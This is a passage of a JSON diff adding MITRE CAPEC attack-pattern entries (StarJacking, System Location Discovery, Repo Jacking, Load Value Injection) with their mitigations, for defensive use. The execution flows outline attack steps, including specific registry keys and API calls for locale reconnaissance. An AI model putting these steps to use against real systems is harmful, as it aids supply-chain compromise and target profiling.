numerous negative technical impacts, while the victim remains unaware of any malicious activity.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source repository whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of repository metadata to convince victims the source is trusted." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e7ede74a-5958-4c35-81c2-b20c2ae72b84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--958d0282-f24d-4dda-ae92-2cdf628a4b77", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52c28138-05db-427b-826f-91b05c7feac4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e084ced-2d86-4141-97a2-36ef7f526698", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1d932a5-cb1e-454a-827e-2a04f9dd3162", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c19f6cd-f83c-49c0-bd5c-2b6a8ecb12f2", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cca8249-8f72-4182-84f5-29a7522d98d6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e0aa60e-0ea0-401d-800a-881f35742e84", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3367eda0-00c6-4f77-868b-eb58f728d80e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2b1e7b0-5eb8-41e4-bfda-7afcb3a8fbdb", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-693", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Tzachi Zornstein, StarJacking – Making Your New Open Source Package Popular in a Snap, 2022--04---19, Checkmarx", + "external_id": "REF-721", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/starjacking-making-your-new-open-source-package-popular-in-a-snap/" + } + ], + "id": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "modified": "2022-09-29T00:00:00.000Z", + "name": "StarJacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In April 2022, Checkmarx reported that packages hosted on NPM, PyPi, and Yarn do not properly validate that the provided GitHub repository URL actually pertains to the package being provided. Combined with additional attacks such as TypoSquatting, this allows adversaries to spoof popularity metadata by associating popular GitHub repository URLs with the malicious package. This can further lead to developers unintentionally including the malicious package within their development environments [REF-721]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target package whose popularity statistics will be leveraged. This will be a popular and widely used package, as to increase the perceived pedigree of the malicious package.

Experiment

  1. Spoof package popularity: The adversary provides their malicious package to a package manager and uses the source code repository URL identified in Step 1 to spoof the popularity of the package. This malicious package may also closely resemble the legitimate package whose statistics are being utilized.

Exploit

  1. Exploit victims: The adversary infiltrates development environments with the goal of conducting additional attacks.

    2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious package by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage the malicious package.
", + "x_capec_extended_description": "\n Many open-source software packages are hosted via third-party package managers (e.g., Node Package Manager, PyPi, Yarn, etc.) that allow for easy integration of software components into existing development environments. A package manager will typically include various metadata about the software and often include a link to the package's source code repository, to assist developers in determining the trustworthiness of the software. One common statistic used in this decision-making process is the popularity of the package. This entails checking the amount of \"Stars\" the package has received, which the package manager displays based on the provided source code repository URL. However, many package managers do not validate the connection between the package and source code repository being provided. Adversaries can thus spoof the popularity statistic of a malicious package by associating a popular source code repository URL with the package. This can ultimately trick developers into unintentionally incorporating the malicious package into their development environment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source package whose popularity metadata is to be used for the malicious package." + ], + "x_capec_skills_required": { + "Low": "Ability to provide a package to a package manager and associate a popular package's source code repository URL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source packages, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--497b80f8-f95d-460c-9dcf-aa331b2ed9bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d52984d-c34c-4aec-825b-5aafc55818aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--497b80f8-f95d-460c-9dcf-aa331b2ed9bd", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--1e8b4827-7c48-453b-b08d-b88b9f81917c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--898f5368-60ae-4688-851e-a78e94c98572", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e8b4827-7c48-453b-b08d-b88b9f81917c", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7ed969a-dced-41b9-98f6-c2836ad4a870", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source packages from reputable package managers.", + "id": "course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--501c303f-fb43-4395-9b2b-5d43311228dd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source packages, ensure integrity values have not changed.", + "id": "course-of-action--c5d6d68d-5f52-4780-bf41-c003cb6e4a8a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca50af9a-124b-455d-8cfb-b65d4802ab64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c5d6d68d-5f52-4780-bf41-c003cb6e4a8a", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the package, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--c8124caa-0363-4ab9-b7e2-241f17311f63", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ccd42f0-bdc3-4ab4-a1cf-e0544db6a281", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c8124caa-0363-4ab9-b7e2-241f17311f63", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary collects information about the target system in an attempt to identify the system's geographical location.\n Information gathered could include keyboard layout, system language, and timezone. This information may benefit an adversary in confirming the desired target and/or tailoring further attacks.\n ", + "external_references": [ + { + "external_id": "CAPEC-694", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/694.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "System Language Discovery", + "external_id": "T1614", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1614" + }, + { + "description": "Language-Specific Registry Entries", + "external_id": "REF-727", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/language-specific-registry-entries" + }, + { + "description": "winnls.h header", + "external_id": "REF-728", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/windows/win32/api/winnls/" + }, + { + "description": "local (1p) - Linux Man Pages", + "external_id": "REF-729", + "source_name": "reference_from_CAPEC", + "url": "https://www.systutorials.com/docs/linux/man/1p-locale/" + }, + { + "description": "vconsole.conf", + "external_id": "REF-730", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/vconsole.conf.html" + }, + { + "description": "timedatectl", + "external_id": "REF-731", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/timedatectl.html" + } + ], + "id": "attack-pattern--83f12d51-7469-4f09-99cc-fa4a3ea8197d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "System Location Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. System Locale Information Discovery: The adversary examines system information from various sources such as registry and native API functions and correlates the gathered information to infer the geographical location of the target system

    2. Techniques
    Registry Query: Query the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\Language_Dialect on Windows to obtain system language, Computer\\HKEY_CURRENT_USER\\Keyboard Layout\\Preload to obtain the hexadecimal language IDs of the current user's preloaded keyboard layouts, and Computer\\HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation to obtain the system timezone configuration
    Native API Requests: Parse the outputs of Windows API functions GetTimeZoneInformation, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID to obtain information about languages, keyboard layouts, and timezones installed on the system or on macOS or Linux systems, query locale to obtain the $LANG environment variable and view keyboard layout information or use timeanddatectl status to show the system clock settings.
    Read Configuration Files: For macOS and Linux-based systems, view the /etc/vconsole.conf file to get information about the keyboard mapping and console font.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have some level of access to the system and have a basic understanding of the operating system in order to query the appropriate sources for relevant information." + ], + "x_capec_resources_required": [ + "The adversary requires access to the target's operating system tools to query relevant system information. On windows, registry queries can be conducted with powershell, wmi, or regedit. On Linux or macOS, queries can be performed with through a shell." + ], + "x_capec_skills_required": { + "Low": "The adversary must know how to query various system sources of information respective of the system's operating system to obtain the relevant information." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To reduce the amount of information gathered, one could disable various geolocation features of the operating system not required for system operation.", + "id": "course-of-action--18f5bca4-2458-41da-8242-fa30bb7d55a6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-694-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1233daf6-156e-4dbc-9167-b0d259a5595d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--18f5bca4-2458-41da-8242-fa30bb7d55a6", + "target_ref": "attack-pattern--83f12d51-7469-4f09-99cc-fa4a3ea8197d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.\n ", + "external_references": [ + { + "external_id": "CAPEC-695", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Indiana Moreau, Repo Jacking: Exploiting the Dependency Supply Chain, 2020--10---22, Security Innovation", + "external_id": "REF-722", + "source_name": "reference_from_CAPEC", + "url": "https://www.concretecms.org/about/project-news/security/supply-chain-hack-phpass-repo-jacking" + }, + { + "description": "Theo Burton, CyRC Vulnerability Analysis: Repo jacking in the software supply chain, 2022--08---02, Synopsys", + "external_id": "REF-732", + "source_name": "reference_from_CAPEC", + "url": "https://www.synopsys.com/blogs/software-security/cyrc-vulnerability-analysis-repo-jacking/" + }, + { + "description": "Jossef Harush, Attacker Caught Hijacking Packages Using Multiple Techniques to Steal AWS Credentials, 2022--05---25, Checkmarx", + "external_id": "REF-733", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/attacker-caught-hijacking-packages-using-multiple-techniques-to-steal-aws-credentials/" + }, + { + "description": "Jossef Harush, GitHub RepoJacking Weakness Exploited in the Wild by Attackers, 2022--05---27, Checkmarx", + "external_id": "REF-734", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/github-repojacking-weakness-exploited-in-the-wild-by-attackers/" + } + ], + "id": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Repo Jacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In May 2022, the CTX Python package and PhPass PHP package were both exploited by the same adversary via Repo Jacking attacks. For the CTX package, the adversary performed an account takeover via a password reset, due to an expired domain-hosting email. The attack on PhPass entailed bypassing GitHub's authentication for retired repositories. In both cases, sensitive data in the form of API keys and passwords, each stored in the form of environment variables, were exfiltrated. [REF-732] [REF-733]\n ", + "\n In October 2021, the popular JavaScript library UAParser.js was exploited via the takeover of the author's Node Package Manager (NPM) account. The adversary-provided malware downloaded and executed binaries from a remote server to conduct crypto-mining and to exfiltrate sensitive data on Windows systems. This was a wide-scale attack as the package receives 8 to 9 million downloads per week. [REF-732]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository that is commonly used and whose owner/maintainer has either changed/deleted their username or transferred ownership of the repository and then deleted their account. The target should typically be a popular and widely used package, as to increase the scope of the attack.

Experiment

  1. Recreate initial repository path: The adversary re-registers the account that was renamed/deleted by the target repository's owner/maintainer and recreates the target repository with malicious code intended to exploit an application. These steps may need to happen in reverse (i.e., recreate repository and then rename an existing account to the target account) if protections are in place to prevent repository reuse.

Exploit

  1. Exploit victims: The adversary's malicious code is incorporated into applications that directly reference the initial repository, which further allows the adversary to conduct additional attacks.

", + "x_capec_extended_description": "\n Software developers may directly reference a VCS repository (i.e., via a hardcoded URL) within source code to integrate the repository as a dependency for the underlying application. If the repository owner/maintainer modifies the repository name, changes their VCS username, or transfers ownership of the repository, the VCS implements a redirect to the new repository location so that existing software referencing the repository will not break. However, if the original location of the repository is reestablished, the VCS will revert to resolving the hardcoded path. Adversaries may, therefore, re-register deleted or previously used usernames and recreate repositories with malicious code to infect applications referencing the repository. When an application then fetches the desired dependency, it will now reference the adversary's malicious repository since the hardcoded repository path is once again active. This ultimately allows the adversary to infect numerous applications, while achieving a variety of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular repository that may be directly referenced in numerous software applications", + "A repository owner/maintainer who has recently changed their username or deleted their account" + ], + "x_capec_skills_required": { + "Low": "Ability to create malware that can exploit various software applications." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage dedicated package managers instead of directly linking to VCS repositories.", + "id": "course-of-action--9c30154d-5f71-4019-a0a5-68eb7c6f41c9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5aa0bb89-76f3-4d2b-a3d4-fa7d609fb90c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c30154d-5f71-4019-a0a5-68eb7c6f41c9", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize version pinning and lock files to prevent use of maliciously modified repositories.", + "id": "course-of-action--d63a9ee6-20cc-4f7d-98de-af8c1bba5ae9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be755a2d-2e70-4eea-ad7a-2cd9960dbc0c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d63a9ee6-20cc-4f7d-98de-af8c1bba5ae9", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement \"vendoring\" (i.e., including third-party dependencies locally) and leverage automated testing techniques (e.g., static analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--38cf9fc1-7e97-44bb-bed9-77d94120caec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--967eaeff-e2b8-48c4-9514-9bb0e381ffb3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38cf9fc1-7e97-44bb-bed9-77d94120caec", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools, such as Checkmarx's \"ChainJacking\" tool, to determine susceptibility to Repo Jacking attacks.", + "id": "course-of-action--55b3c0e8-5896-4190-9262-19406b3de296", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04ce1f7f-b24d-413f-a857-e285a30a2271", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55b3c0e8-5896-4190-9262-19406b3de296", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution in which a faulting or assisted load instruction transiently forwards adversary-controlled data from microarchitectural buffers. By inducing a page fault or microcode assist during victim execution, an adversary can force legitimate victim execution to operate on the adversary-controlled data which is stored in the microarchitectural buffers. The adversary can then use existing code gadgets and side channel analysis to discover victim secrets that have not yet been flushed from microarchitectural state or hijack the system control flow.", + "external_references": [ + { + "external_id": "CAPEC-696", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/696.html" + }, + { + "external_id": "CWE-1342", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1342.html" + }, + { + "description": "Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, Frank Piessens, LVI - Hijacking Transient Execution with Load Value Injection", + "external_id": "REF-735", + "source_name": "reference_from_CAPEC", + "url": "https://lviattack.eu/" + }, + { + "description": "Load Value Injection, 2020--01---27, Intel", + "external_id": "REF-736", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/load-value-injection.html" + } + ], + "id": "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Load Value Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_consequences": { + "Access_Control": [ + 